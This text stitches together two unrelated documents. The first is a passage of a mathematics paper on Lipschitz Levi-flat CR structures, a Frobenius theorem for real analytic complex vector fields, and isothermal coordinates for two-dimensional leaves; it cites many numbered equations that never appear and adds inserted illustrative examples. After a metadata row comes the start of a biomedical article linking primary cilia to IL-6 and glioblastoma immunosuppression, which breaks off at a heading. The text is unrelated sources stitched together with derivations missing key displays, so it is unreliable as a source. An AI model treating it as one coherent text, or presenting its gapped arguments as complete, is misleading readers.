With respect to such a local frame field, for x ∈ U_1 we can identify E_x/V_x with the linear span of X_{ℓ+1}(x), ..., X_k(x), and we can represent J by a (k − ℓ) × (k − ℓ) matrix-valued function, as in (6.7). One analyzes the relevant brackets for 1 ≤ i ≤ ℓ, ℓ + 1 ≤ j ≤ k, by (6.1) and (6.6). Taking Y_j to be the sum in (6.7), and noting that the expression (6.9) is again controlled by (6.6), we deduce that (6.9) actually vanishes, and hence (6.10) holds.

In a fashion parallel to (2.17) and (3.1), we set up the map G built from the flows of X_1, ..., X_k, as in Hypothesis V. By Proposition 2.3, G : U_0 → U_1 is a bi-Lipschitz map from a neighborhood U_0 of (0, 0) ∈ R^k × R^{n-k} to a neighborhood U_1 of p ∈ Ω. We denote by V_0 ⊂ T U_0 the pull back of V, by E_0 ⊂ T U_0 the pull back of E, and by S_0 ⊂ CT U_0 the pull back of S. Note that V_0 is spanned by ∂/∂t_j, 1 ≤ j ≤ ℓ, and E_0 by ∂/∂t_j, 1 ≤ j ≤ k. The quotient bundle E_0/V_0 is isomorphic to the span of ∂/∂t_j for ℓ + 1 ≤ j ≤ k, and the complex structure J on E/V pulls back to J_0, given by (6.12). The result (6.10) is equivalent to (6.13), so we can write J_0 = J_0(t_{ℓ+1}, ..., t_k, z), as in (6.14). At this point it is natural to form the quotient space Ū_0 = U_0/∼, where we use the equivalence relation

(6.15) (t, z) ∼ (s, z) ⟺ (t_{ℓ+1}, ..., t_k) = (s_{ℓ+1}, ..., s_k).
Note that U_1 fibers over Ū_0, via

(6.16) π = (P × id) ∘ G^{-1},

where P(t_1, ..., t_k) = (t_{ℓ+1}, ..., t_k). We will display a Levi-flat CR structure on Ū_0, with Ē_0 the span of ∂/∂t_j, ℓ + 1 ≤ j ≤ k, and with an associated bundle S̄_0 ⊂ CT Ū_0. To see this, note that a vector field of the form (6.19), with no components in the ∂/∂t_1, ..., ∂/∂t_ℓ directions and with coefficients independent of (t_1, ..., t_ℓ), can be regarded as a vector field on either U_0 or Ū_0. In the latter guise it is a Lipschitz section of S̄_0. The involutivity condition (6.1) has a counterpart for S̄_0, which implies that the Nijenhuis tensor of J̄_0 vanishes, so Ū_0 has a Levi-flat CR structure, associated with S̄_0, the span of vectors of the form (6.19). This establishes the main result of this section, which we state formally.
Proposition 6.1. Assume S and S + S̄ are Lipschitz subbundles of CT Ω, satisfying the involutivity condition (6.1) and also Hypothesis V. Then each p ∈ Ω has a neighborhood U_1 and a Lipschitz fibration π : U_1 → Ū_0 onto a Levi-flat CR manifold, associated to a Lipschitz subbundle S̄_0 ⊂ CT Ū_0, such that Dπ carries S to S̄_0.

We show that additional regularity conditions on V and E imply Hypothesis V.
Proposition 6.2. Assume each p ∈ Ω has a neighborhood on which there is a frame field {W_1, ..., W_k} for E, of class C^{1,1}, such that {W_1, ..., W_ℓ} is a local frame field for V. Then Hypothesis V holds.
A. A Frobenius theorem for real analytic, complex vector fields
Let X_1, ..., X_m be real analytic, complex vector fields on an open set O ⊂ R^n. We assume

(A.1) [X_k, X_ℓ] = 0, 1 ≤ k, ℓ ≤ m.
We want to obtain conditions under which we can find real analytic solutions u to

(A.2) X_k u = 0, 1 ≤ k ≤ m,

on a neighborhood of a given point p ∈ O. We proceed as follows. Say

(A.3) X_k = Σ_j a_kj(x) ∂/∂x_j.

On a neighborhood Ω of p in C^n set

(A.4) Z_k = Σ_j a_kj(z) ∂/∂z_j,

with a_kj(z) holomorphic extensions of a_kj(x). Solving (A.2) is equivalent to finding a holomorphic solution u to

(A.5) Z_k u = 0, 1 ≤ k ≤ m,

on a neighborhood of p in C^n. Note that (A.1) implies

(A.6) [Z_k, Z_ℓ] = 0, 1 ≤ k, ℓ ≤ m.
Our next step involves passing to real vector fields on Ω ⊂ C^n ≈ R^{2n}. Generally, if

(A.7) Z = Σ_j a_j(z) ∂/∂z_j,

with f_j and g_j real valued and

(A.8) a_j = f_j + i g_j,

then set

(A.9) Y = ΦZ = Σ_j ( f_j ∂/∂x_j + g_j ∂/∂y_j ).

If Z is a holomorphic vector field, i.e., if (A.7) holds with a_j(z) holomorphic, we say Y = ΦZ is a real-holomorphic vector field. Our first lemma (Lemma A.1) holds whether or not the coefficients of Z are holomorphic; it concerns fields Z_k satisfying (A.6), with Y_k = Φ(Z_k). The proof is a straightforward calculation, making use of the expressions for ∂/∂x_j and ∂/∂y_j in terms of ∂/∂z_j and ∂/∂z̄_j. The following is special to holomorphic vector fields, namely that Φ preserves the Lie bracket when applied to such vector fields.
Again the proof is a straightforward (though slightly tedious) calculation. It follows that if X_k and Z_k are as in (A.3)-(A.4), and if

(A.13) Y_k = ΦZ_k,

then

(A.14) [Y_k, Y_ℓ] = 0, 1 ≤ k, ℓ ≤ m.

The complex structure on C^n produces a complex structure on the space of real vector fields on Ω, defined by

(A.15) J(∂/∂x_j) = ∂/∂y_j, J(∂/∂y_j) = −∂/∂x_j.

Note that if Z has the form (A.7), then

(A.16) J(ΦZ) = Φ(iZ).

In particular, if Y_k are as in (A.13),

(A.17) [Y_k, JY_ℓ] = 0 = [JY_k, JY_ℓ], 1 ≤ k, ℓ ≤ m.
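As a concrete illustration of this correspondence, consider the following worked example (added here for orientation; it is not part of the original argument). Take n = 1 and Z = ∂/∂z, so a_1 = 1, f_1 = 1, g_1 = 0. Then ΦZ = ∂/∂x and, since iZ has coefficient i = 0 + i·1, J(ΦZ) = Φ(iZ) = ∂/∂y, consistent with (A.15)-(A.16). Moreover, if u is holomorphic, so that ∂u/∂z̄_j = 0, then using ∂/∂x_j = ∂/∂z_j + ∂/∂z̄_j and ∂/∂y_j = i(∂/∂z_j − ∂/∂z̄_j), one computes

(ΦZ)u = Σ_j ( f_j ∂u/∂x_j + g_j ∂u/∂y_j ) = Σ_j (f_j + i g_j) ∂u/∂z_j = Zu,

so on holomorphic functions the real field ΦZ acts exactly as Z. This is the mechanism by which statements about the real fields Y_k transfer back to the complex fields Z_k, as in the passage from (A.34) to (A.5) below.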
One advantage of using the real vector fields Y_k on Ω is that they generate local flows F^t_{Y_k} on Ω. In this context, the following results are very useful. Suppose Y is a real-holomorphic vector field on Ω. It follows from (A.16) that so is JY, and Y and JY commute. Thus so do the local flows F^s_Y and F^t_{JY}. The following gives important information on how these flows fit together.

Proposition A.3. If Y is a real-holomorphic vector field on Ω, then, for each z ∈ Ω,

(A.18) s + it ↦ F^s_Y F^t_{JY}(z) is holomorphic.

Proof. Denote the 2-parameter orbit in (A.18) by ϕ(s, t). By commutativity we also have

(A.19) ϕ(s, t) = F^t_{JY} F^s_Y(z).

It follows that

(A.20) ∂ϕ/∂s = Y(ϕ(s, t)), ∂ϕ/∂t = JY(ϕ(s, t)),

and hence ∂ϕ/∂t = J ∂ϕ/∂s, which gives the asserted holomorphicity.
The following is an important complement.
Proposition A.4. If Y is a real-holomorphic vector field on Ω, then F^t_Y is a local group of holomorphic maps.
Proof. The claim is equivalent to the assertion

(A.21) F^t_{Y#} commutes with J,

where, given a diffeomorphism F, F_# is the induced operator on vector fields. One has a standard formula (A.22) for (d/dt) F^t_{Y#} W; cf. (8.3) in Chapter I of [T]. Hence one obtains an expression (A.23) for the t-derivative of the commutation defect F^t_{Y#} JW − J F^t_{Y#} W. If Y = ΦZ with Z a holomorphic vector field, as in (A.7)-(A.9), then a calculation using (A.24) shows that, for any vector field W, the bracket identity (A.25) holds, so the quantity (A.23) vanishes. More generally, the latter identity persists under iterated brackets, by (A.25). An iteration gives (A.27); in particular, (A.28) holds for all ℓ ∈ Z^+. In the current context, F^t_Y and all its derived quantities are real analytic in t (as a consequence of Proposition A.3), so (A.21) follows from (A.28).
We proceed to find solutions to (A.2), under appropriate hypotheses. For notational simplicity, assume p is the origin; p = 0 ∈ R^n ⊂ C^n. Suppose

(A.29) V is a linear subspace of R^n, of dimension n − m,

and let

(A.30) 𝒱 be the complexification of V,

so 𝒱 is a complex subspace of C^n, of complex dimension n − m (hence real dimension 2n − 2m). Let v be a real analytic function on a neighborhood U of 0 in V, extended to a holomorphic function on a neighborhood Ũ of 0 in 𝒱. We assume a transversality condition (A.31) on U; in particular, its pointwise version (A.32) holds at the origin. Conversely, if (A.32) holds, then (A.31) holds, possibly with U shrunken. In such a case, we can set u equal to v on Ũ and extend it to be invariant under the flows of the commuting fields Y_k and JY_k, as in (A.33), and see that u is holomorphic on a neighborhood of 0 in C^n and solves (A.34). Hence, by Lemma A.1, (A.5) holds, and hence, possibly shrinking U, we have solutions to (A.2), as in (A.35).

A classic example to which this construction applies arises in the real analytic case of the Newlander-Nirenberg theorem. In this setting, one has n = 2m and takes ξ_j = x_j + i x_{j+m}, 1 ≤ j ≤ m, together with the vector fields (A.38). These vector fields arise from an almost complex structure J_0 on O ⊂ R^n, and the integrability condition is that they commute, i.e., that (A.1) holds. Then a function u on O is holomorphic with respect to this almost complex structure if and only if (A.2) holds, and the theorem is that if (A.1) holds then there are m such functions forming a local coordinate system, in a neighborhood of 0. In this case, Y_k(0) and JY_k(0) are given by (A.39)-(A.40). Let us take for V ⊂ R^n the space

(A.41) V = {x ∈ R^n : x_{m+1} = · · · = x_{2m} = 0},

so

(A.42) 𝒱 = {x + iy ∈ C^n : x_{m+1} = · · · = x_{2m} = y_{m+1} = · · · = y_{2m} = 0},

which is spanned over R by the vectors listed in (A.43). It is clear that if Y_k(0) and JY_k(0) are given by (A.39)-(A.40), then (A.32) holds, so we have solutions to (A.35) in this case, for some neighborhood U of 0 in V, and arbitrary real analytic v on U. This provides enough J_0-holomorphic functions on a neighborhood of 0 in R^n to yield a coordinate system. In this fashion the real analytic case of the Newlander-Nirenberg theorem is proven.
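For orientation, here is the simplest instance of the preceding scheme, worked out explicitly; this is an illustration consistent with the construction above (take m = 1, n = 2), not a reproduction of the displays (A.36)-(A.43). The field

X = ∂/∂x_1 + i ∂/∂x_2 on O ⊂ R^2

satisfies X = 2 ∂/∂ξ̄ with ξ = x_1 + i x_2, so Xu = 0 exactly for u holomorphic in ξ. Its extension to C^2 is Z = ∂/∂z_1 + i ∂/∂z_2, with a_1 = 1, a_2 = i, whence

Y = ΦZ = ∂/∂x_1 + ∂/∂y_2, JY = Φ(iZ) = ∂/∂y_1 − ∂/∂x_2.

Taking V = {x ∈ R^2 : x_2 = 0}, the four vectors Y(0), JY(0), ∂/∂x_1, ∂/∂y_1 (the last two spanning the complexification of V over R) are linearly independent in R^4 ≈ C^2, which is the transversality required at the origin. Prescribing a real analytic v on the line x_2 = 0 and propagating it along the flows of Y and JY then recovers the familiar fact that u(x_1, x_2) = h(x_1 + i x_2), with h the holomorphic extension of v, solves Xu = 0 with u(x_1, 0) = v(x_1).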
B. The case of two-dimensional leaves
Here we put ourselves in the setting of §3, and take the Lipschitz bundle E to have fiber dimension k = 2m = 2. We assume E has a complex structure J, pulled back as in §3 to a complex structure J_0 ∈ End(E_0), where E_0 ⊂ T U_0 is the bundle spanned by ∂/∂t_1, ∂/∂t_2. Here U_0 ⊂ R^n is an open set with coordinates (t, z), t ∈ R^2, z ∈ R^{n-2}. We assume a Hölder regularity hypothesis (B.1), with r ∈ (0, 1), in which case

(B.2) J_0 ∈ C^r(U_0).

We can represent J_0 = J_0(t, z) as a 2 × 2 matrix valued function of (t, z). Making a preliminary change of coordinates of the form (B.3), where A(z) is a GL(2, R)-valued function of the same type of regularity as J_0 in (B.2), we can arrange that

(B.4) J_0(0, z) takes the standard form.

In order to implement the classical method of finding isothermal coordinates, we impose a family of Riemannian metric tensors on t-space, depending on z as a parameter, (g_{ij}(t, z)), 1 ≤ i, j ≤ 2, arranged so that J_0(t, z) is an isometry on T_tR^2 with respect to the induced inner product, for each (t, z). One could, for example, start with the standard flat metric (δ_{ij}) and average with respect to the Z/(4)-action generated by J_0. We then obtain

(B.5) g_{ij} ∈ C^r(U_0),

when (B.2) holds, and we can arrange that

(B.6) g_{ij}(0, z) = δ_{ij}.
Let D = {t ∈ R^2 : t_1^2 + t_2^2 < 1}. We want to find a harmonic function u_1 on D equal to t_1 on ∂D (and depending on the parameter z). Thus, with a^{ij}(t, z) = g(t, z)^{1/2} g^{ij}(t, z), where (g^{ij}) is the inverse of the matrix (g_{ij}) and g its determinant, we want to solve

(B.7) Σ_{i,j} ∂_i ( a^{ij} ∂_j u_1 ) = 0, u_1 = t_1 on ∂D,

where ∂_i = ∂/∂t_i, i = 1, 2. Without changing notation, we dilate the t-coordinates, and we can assume

(B.8) ‖a^{ij} − δ_{ij}‖_{C^r} ≤ η,

where η > 0 is a sufficiently small quantity. Let us write (B.7) as

(B.9) Δu_1 + R_z u_1 = 0, R_z w = Σ_{i,j} ∂_i ( r^{ij} ∂_j w ), r^{ij} = a^{ij} − δ_{ij}.

To establish solvability of (B.9), when η in (B.8) is small enough, note that it is equivalent to the following equation for v = u_1 − t_1:

(B.10) Δv + R_z v = −R_z t_1, v = 0 on ∂D,

hence to

(B.11) v = −G( R_z v + R_z t_1 ),

i.e., to the equation

(B.12) (I + G R_z) v = −G R_z t_1,

where G is the solution operator to the Poisson problem for Δ on D, with the Dirichlet boundary condition. Such G has the property

(B.13) G : C^{r-1}_*(D) → C^{r+1}(D), 0 < r < 1;

cf. [T], Chapter 13, (8.54)-(8.55). Hence the operator norm bound (B.14) follows, so if η is small enough, the operator norm of G R_z on C^{r+1}(D) is ≤ 1/2, so I + G R_z in (B.12) is invertible on C^{r+1}(D), and we have a unique solution v, satisfying

(B.15) ‖v‖_{C^{r+1}(D)} ≤ Cη.

We now have u_1 = t_1 + v. The standard construction of the harmonic conjugate u_2, satisfying

(B.16) du_2 = (J_0)^t du_1, u_2(0, z) = 0,

gives

(B.17) ‖u_2 − t_2‖_{C^{r+1}(D)} ≤ Cη,

and taking u = u_1 + i u_2, we have a local holomorphic coordinate system on each leaf z = z_0, if η is small enough. We now want to determine how smooth u_i(t, z) are in z, first in the case i = 1. So pick points z and z′ and set w = u_1(t, z) − u_1(t, z′). Hence

(B.18) Δw + R_z w = (R_{z′} − R_z) u_1(·, z′), w = 0 on ∂D.

An argument similar to (B.11)-(B.14) yields, for s ∈ (0, r],

(B.20) ‖w‖_{C^{1+s}(D)} ≤ C ‖r^{ij}(·, z) − r^{ij}(·, z′)‖_{C^s(D)} ‖u_1(·, z′)‖_{C^{s+1}(D)}.
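To make the invertibility step explicit, here is a short worked elaboration (added for clarity; the norm bound is the one asserted in (B.13)-(B.15)). If ‖G R_z‖ ≤ 1/2 on C^{r+1}(D), then I + G R_z is inverted by its Neumann series, and from (B.12),

v = Σ_{k ≥ 0} (−G R_z)^k (−G R_z t_1),

so that

‖v‖_{C^{r+1}(D)} ≤ Σ_{k ≥ 0} 2^{-k} ‖G R_z t_1‖_{C^{r+1}(D)} = 2 ‖G R_z t_1‖_{C^{r+1}(D)} ≤ C ‖r^{ij}‖_{C^r} ≤ Cη,

using (B.13) together with (B.8); this is the estimate (B.15).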
We obtain a CR function on an open set in U_1 by composing u = u_1 + i u_2 with the inverse of the bi-Lipschitz map G, given in (3.1): ũ = u ∘ G^{-1}. We have Y_j ũ = (∂u/∂t_j) ∘ G^{-1}, where {Y_1, Y_2} is the Lipschitz frame field for E that pulls back to {∂/∂t_1, ∂/∂t_2}. It follows that

(B.29) ũ, Y_j ũ ∈ C^{r-δ}, ∀ δ > 0.
We formally state the main conclusion of this appendix. Since the result is local, we may as well take Ω to be an open set in some Euclidean space.
Proposition B.1. Let Ω have a Lipschitz, Levi-flat CR-structure, with leaves tangent to E of real dimension two. Then each p ∈ Ω has a neighborhood U on which there is a CR-function

(B.56) ũ : U → C,

which is a holomorphic diffeomorphism on each leaf, intersected with U, into C, with the following regularity: for any a > 0 and any Lipschitz section Y of E, an associated modulus-of-continuity estimate holds for ũ and Y ũ, for x, x′ ∈ U, |x − x′| ≤ 1/2.
Remark. Since a tool in the analysis of the Lipschitz CR-structures was an analysis of families of much less regular almost complex structures, it is worth mentioning the fundamental work of Ahlfors and Bers [AB] on the endpoint case, involving merely L^∞ almost complex structures. See also [A] and [D] for treatments; the latter article also discusses dependence on parameters. In such a case the C^1 regularity collapses to Hölder continuity, and it does not seem that the techniques used there lead to an improvement of Proposition B.1. | 2007-11-08T20:52:20.000Z | 2006-08-16T00:00:00.000 | {
"year": 2007,
"sha1": "d7ac596cec02afba76126957c65d9fdf1280785d",
"oa_license": null,
"oa_url": "https://www.ams.org/tran/2007-359-01/S0002-9947-06-04067-0/S0002-9947-06-04067-0.pdf",
"oa_status": "BRONZE",
"pdf_src": "Arxiv",
"pdf_hash": "0aecaf60c5217b1cfd22dc0cdbb60b7cee72b2c5",
"s2fieldsofstudy": [
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics"
]
} |
266367748 | pes2o/s2orc | v3-fos-license | Glioblastoma may evade immune surveillance through primary cilia-dependent signaling in an IL-6 dependent manner
Glioblastoma is the most common malignant primary brain tumor in adults and remains universally fatal. While immunotherapy has vastly improved the treatment of several solid cancers, efficacy in glioblastoma is limited. These challenges are due in part to the propensity of glioblastoma to recruit immunosuppressive immune cells, which act in conjunction with tumor cells to create a pro-tumor immune microenvironment through secretion of several soluble factors. Glioblastoma-derived extracellular vesicles (EVs) induce myeloid-derived suppressor cells (MDSCs) and non-classical monocytes (NCMs) from myeloid precursors, leading to systemic and local immunosuppression. This process is mediated by IL-6, which contributes to the recruitment of tumor-associated macrophages of the M2 immunosuppressive subtype; these macrophages, in turn, upregulate anti-inflammatory cytokines including IL-10 and TGF-β. Primary cilia are highly conserved organelles involved in signal transduction and play critical roles in glioblastoma proliferation, invasion, angiogenesis, and chemoradiation resistance. In this perspectives article, we provide preliminary evidence that primary cilia regulate intracellular release of IL-6. This ties primary cilia mechanistically to tumor-mediated immunosuppression in glioblastoma and, potentially, in additional neoplasms that share this mechanism of cancer-mediated immunosuppression. We propose potentially testable hypotheses of the cellular mechanisms behind this finding.
Introduction
Glioblastoma is the most common malignant brain tumor, with a mean survival of 15 months and an average 5-year survival of 6.9% (1). Despite significant effort to develop novel therapies, there has been little improvement in outcomes. The pathogenesis of glioblastoma involves myriad cellular adaptations which promote proliferation, invasion, angiogenesis, DNA repair, and immune suppression. Immunotherapies have garnered significant interest among the scientific community and have revolutionized treatment of several solid cancers. Glioblastoma is notorious for propagating an immunosuppressive tumor microenvironment (TME) by suppressing infiltrating immune cells via numerous pathways which work both locally and systemically. In the local tumor microenvironment, production of tryptophan metabolites, secretion of cytokines including IL-6 and IL-10, and an increase in membrane expression of checkpoint proteins like PD-L1 result in local immunosuppression. Contemporary evidence also implicates glioblastoma-derived extracellular vesicles (EVs) in upregulation of myeloid-derived suppressor cells (MDSCs), which contribute to systemic immunosuppression (2)(3)(4)(5). While it is known that glioblastoma generates an immunosuppressive TME, the specific alterations in gene expression and cellular signaling which trigger this immunosuppressive phenotype remain enigmatic.
Primary cilia are non-motile, microtubule-based organelles which act in key signaling pathways, e.g., EGFR (6), Shh (7), WNT (8), TGF (9), and Notch (10). The primary cilium is anchored to the plasma membrane by the basal body. The basal body is important because it acts as a template for cilia construction and repurposes itself in cell division as the mother centriole (11). The implication of this juxtaposition with the centrosome is that the primary cilium must be disassembled before the cell can transition from the G0/G1 phase to the cycling S/G2/M phases of mitosis (12). This "ciliary checkpoint" acts as a brake, confining the cell to the G0/G1 phase. Perhaps unsurprisingly, many systemic and CNS malignancies including glioblastoma, melanoma, pancreatic, liver, and prostate cancers demonstrate reduction in primary cilia frequency, though in each of these tumors, a ciliated cell population remains (13,14). In this perspectives article, we present evidence for a potential role of primary cilia as master regulators of glioblastoma-mediated immunosuppression through the regulation of IL-6. This is a novel idea which may ultimately yield deeper understanding of the pathogenesis of glioblastoma and other cancers which rely on this shared mechanism, and may also allow for development of potentially novel and urgently needed therapeutic strategies.
Source of human glioblastoma cells and cell culture
Human glioblastoma cells (dBT114 and dBT116) were acquired from the Brain Tumor PDX National Resource Database established by Sarkaria et al. at the Mayo Clinic (Mayo Clinic IRB 312-003458). Cells were cultured in DMEM/F12 (Thermo Fisher Scientific, Waltham, MA) with 10% fetal bovine serum (FBS) and 1% Pen/Strep and incubated in 5% CO2 at 37 degrees Celsius.
Protein knockdown by small interfering RNA

siRNA sequences targeting KIF3A (sc-270301), CCRK (sc-92544), IFT88 (sc-75329), or a nontargeting siRNA control (sc-37007) were acquired (Santa Cruz Inc, Dallas, TX). Each siRNA product consisted of pools of 3-5 target-specific 19-25 nucleotide siRNAs designed to knock down expression of the gene of interest. Glioblastoma cells (2.5 × 10^5) were incubated in DMEM with 10% FBS, and siRNAs were transfected using Lipofectamine RNAiMAX (Thermo Fisher Scientific) per the manufacturer's instructions. Cells were then recovered in complete medium for 24 hours, and the efficacy of gene targeting at the mRNA and protein level was assessed by qRT-PCR and western blotting, respectively.
RNA extraction and qRT-PCR
Total RNA was isolated from glioblastoma cells (3 × 10^5) using the RNeasy Plus Mini Kit (Qiagen, Valencia, CA). Isolated RNA (500 ng) was then used in a reverse-transcription reaction (30 µl) with random hexamers and SuperScript III RT (Thermo Fisher Scientific). The resulting cDNA (5 µl) was used for real-time PCR using the TaqMan gene-expression assays for KIF3A (Hs00199901_m1), CCRK (Hs01114921_m1), IFT88 (Hs00544051_m1), and actin (Hs00188792_m1), according to the manufacturer's instructions. The 2^−ΔΔCt method was used to determine the relative expression levels of the target genes. All experiments were performed in triplicate.
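To make the 2^−ΔΔCt calculation concrete, a minimal Python sketch of the arithmetic described above follows; the Ct values and sample labels are hypothetical placeholders, not data from this study.

import statistics

def ddct_relative_expression(target_ct, ref_ct, target_ct_control, ref_ct_control):
    """Fold change of a target gene vs. an untreated control, normalized
    to a reference gene (actin here), via the 2^(-ddCt) method."""
    dct_sample = statistics.mean(target_ct) - statistics.mean(ref_ct)
    dct_control = statistics.mean(target_ct_control) - statistics.mean(ref_ct_control)
    return 2 ** (-(dct_sample - dct_control))

# Hypothetical triplicate Ct values: KIF3A after siKIF3A vs. siCON,
# with actin as the endogenous reference in both conditions.
fold = ddct_relative_expression(
    target_ct=[26.1, 26.3, 26.0],          # KIF3A Ct, siKIF3A cells
    ref_ct=[17.2, 17.1, 17.3],             # actin Ct, siKIF3A cells
    target_ct_control=[23.9, 24.0, 24.1],  # KIF3A Ct, siCON cells
    ref_ct_control=[17.0, 17.2, 17.1],     # actin Ct, siCON cells
)
print(f"KIF3A expression relative to siCON: {fold:.2f}")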
Enzyme-linked immunosorbent assay
The cellular levels of IL-6 were measured after knockdown of cilia proteins using ELISA. Specifically, the Millipore Human IL-6 ELISA kit (Millipore, Billerica, MA, Cat# RAB0306) was used according to the manufacturer's instructions, and plates were analyzed at 450 nm using a plate reader (BioTek, Winooski, VT). Each sample was assayed in triplicate, from which the means and standard deviations were calculated.
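Because plate readers report optical density rather than concentration, IL-6 values are interpolated from a standard curve. The sketch below fits a four-parameter logistic (4PL) curve, a common choice for sandwich ELISAs; the standard concentrations, OD450 readings, and sample values are hypothetical, not taken from this study or from the kit insert.

import numpy as np
from scipy.optimize import curve_fit

def four_pl(x, a, b, c, d):
    # a: response at zero concentration; d: response at saturation;
    # c: inflection point (pg/mL); b: slope factor.
    return d + (a - d) / (1.0 + (x / c) ** b)

std_conc = np.array([7.8, 15.6, 31.25, 62.5, 125.0, 250.0, 500.0])  # pg/mL
std_od = np.array([0.08, 0.15, 0.27, 0.48, 0.83, 1.32, 1.85])       # OD450

(a, b, c, d), _ = curve_fit(four_pl, std_conc, std_od, p0=[0.05, 1.0, 100.0, 2.2])

def od_to_conc(od):
    """Invert the fitted 4PL curve to recover concentration from OD450."""
    return c * (((a - d) / (od - d)) - 1.0) ** (1.0 / b)

triplicate_od = np.array([0.52, 0.55, 0.50])  # one hypothetical sample
conc = od_to_conc(triplicate_od)
print(f"IL-6: {conc.mean():.1f} +/- {conc.std(ddof=1):.1f} pg/mL")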
Immunocytochemistry
Transfection of dBT116 cells was conducted by transferring 10 µL of shRNA transduction particles (Clone ID TRCN0000199977, SHCLNV, Sigma-Aldrich, St. Louis, MO) in polybrene (10 µg/mL) to a 6-well plate containing 1 × 10^6 dBT116 cells in 3 mL of complete dBT116 cell medium. After 24 hours, the medium was changed to virus-free complete DMEM with 10% FBS, and puromycin selection was initiated (2 µg/mL, Sigma-Aldrich). Immunocytochemistry experiments were conducted on days 5-7 after antibiotic selection.
Two-well chamber slides were coated with collagen type I solution (Sigma-Aldrich, Burlington, MA) diluted in 70% ethanol per the manufacturer's protocol. Cultured cells were seeded and incubated overnight at 37 degrees Celsius. Cells were washed in filtered 1X PBS three times and fixed with 4% formaldehyde for 10 minutes at room temperature. Cells were washed three times in filtered 1X PBS, permeabilized in filtered 0.5% Triton X-100 in PBS for 15 minutes, washed four times, and incubated with filtered blocking solution (PBS containing 0.15% glycine and 0.5% BSA) for 60 minutes at room temperature. Cells were then incubated with primary antibodies in 1X PBS for 1 hour, washed three times with 1X PBS, and incubated in the dark with secondary antibodies conjugated to Alexa Fluor 488 and 549 for Arl13B and gamma tubulin, respectively, in 1X PBS for 1 hour at room temperature (1:300, Invitrogen, Waltham, MA). Primary antibodies used were mouse monoclonal Arl13B (1:300, Invitrogen) and rabbit monoclonal gamma tubulin (1:300, Invitrogen). Antifade mounting medium with DAPI was used to coverslip the slides (Thermo Fisher, P36935). Images were collected using a Leica DMi8 widefield fluorescence microscope with a 20X objective for DAPI, Alexa 488, and Alexa 549 fluorophores (Leica Biosystems, Buffalo Grove, IL).
Statistical analysis
All data represent at least three individual experiments. For the direct comparison of three or more conditions, a one-way analysis of variance was performed, with multiple comparisons analyzed via the Newman-Keuls multiple comparisons test. When directly comparing two conditions, a two-tailed Student's t-test was performed. All comparisons were considered significant at p-values less than 0.05.
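The comparisons described above can be reproduced with SciPy, as in the sketch below; the IL-6 values are hypothetical triplicates, not study data, and since the Newman-Keuls post hoc test (which ranks group means and applies stepwise critical values) is not provided by SciPy, simple pairwise t-tests against control are shown in its place.

from scipy import stats

il6 = {
    "siCON":   [412.0, 398.5, 405.2],
    "siKIF3A": [201.3, 215.8, 208.9],
    "siIFT88": [195.4, 210.2, 189.7],
    "siCCRK":  [220.1, 205.6, 212.4],
}

# One-way ANOVA across the four conditions.
f_stat, p_anova = stats.f_oneway(*il6.values())
print(f"ANOVA: F = {f_stat:.2f}, p = {p_anova:.4g}")

# Pairwise two-tailed t-tests vs. control.
for name in ("siKIF3A", "siIFT88", "siCCRK"):
    t_stat, p = stats.ttest_ind(il6["siCON"], il6[name])
    flag = "significant" if p < 0.05 else "ns"
    print(f"{name} vs siCON: t = {t_stat:.2f}, p = {p:.4g} ({flag})")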
Primary cilia loss reduces IL-6 expression in human glioblastoma cells
The function of primary cilia in cancer has been gaining interest over the past two decades, and cilia are known to influence the pathogenesis of some CNS neoplasms including medulloblastoma, choroid plexus papilloma, and ependymoma (15). In vitro and in vivo models of ciliary ablation, including knockdown or knockout of KIF3A and IFT88, have been invaluable tools for dissecting and understanding the myriad functions of the primary cilium. KIF3A is a microtubule plus end-directed kinesin motor that is required for ciliogenesis (16). Intraflagellar transport protein 88 (IFT88) is necessary for primary cilia assembly via the transport of essential components up the ciliary axoneme (17). Previous immunocytochemistry studies have shown loss of primary cilia following KIF3A or IFT88 knockdown (18,19). Cell cycle-related kinase (CCRK), now known as CDK20, has been specifically implicated in tumor-mediated immunosuppression by induction of MDSCs in response to IL-6 upregulation (20). However, we previously showed that CCRK is required for proper cilia morphogenesis in a knockout mouse model (21). As CCRK is highly overexpressed in glioblastoma and considered an oncogene, we questioned whether the elevated IL-6 expression and the resulting immunosuppressive phenotype were due to CCRK's role in cilia morphology versus other, unrelated activity. To that end, we performed siRNA-mediated knockdown of CCRK as well as KIF3A and IFT88. Our hypothesis was that if IL-6 expression were dependent on primary cilia, then all three knockdowns would result in reduction of IL-6 expression. As demonstrated in Figure 1, siRNA targeted against KIF3A, IFT88, and CCRK resulted in robust knockdown of each protein (Figures 1A, B) as well as each corresponding mRNA (Figure 1C). Fluorescence immunocytochemistry confirmed primary cilia loss with CCRK suppression compared to control (Figures 1F, G). Loss of these essential ciliary genes each resulted in a similar loss of IL-6 protein levels as measured by ELISA (Figures 1D, E).
Discussion
Glioblastoma remains a universally incurable and fatal disease. One important characteristic of glioblastoma is profound local and systemic immunosuppression, the result of a multitude of means by which glioblastoma hijacks the immune system, including the kynurenine-tryptophan (IDO-TDO1) pathway, secretion of pro-mitogenic, immunosuppressive EVs, the release of anti-inflammatory cytokines, and manipulation of checkpoint proteins (e.g., PD-1, CTLA-4). There is considerable interest in studying the biological roles of primary cilia in glioblastoma as a path for drug development. Prior studies established that cilia are present in glioblastoma cells, with one study finding 8-25% of glioblastoma cells bearing primary cilia at any point in time (22). The same group later found that 60-90% of single clones from patient-derived glioblastoma cell lines were able to generate ciliated offspring (23). While cilia-dependent signaling is present in glioblastoma, it is unclear how cilia-dependent signaling cascades act in a tumor-promoting or -suppressing manner. For instance, disruption of cilia formation in glioblastoma cell lines through knockdown of essential ciliogenesis genes, such as KIF3A or IFT88, had variable effects on tumor growth in vitro and in vivo (23). There is evidence, however, that treatments aimed at reducing ciliogenesis could enhance conventional glioblastoma therapies. For instance, PCM1-mediated depletion of cilia in patient-derived glioblastoma cell lines led to decreased proliferation and increased sensitivity to temozolomide (TMZ) treatment (24). There is a preponderance of evidence that now links canonical pathways of glioblastoma immune evasion with primary cilia signaling. The objective of this perspectives article is to review evidence supporting potential mechanisms by which cilia-dependent signal transduction contributes to glioblastoma-mediated immunosuppression.
CCRK, IL-6 and the cilia connection
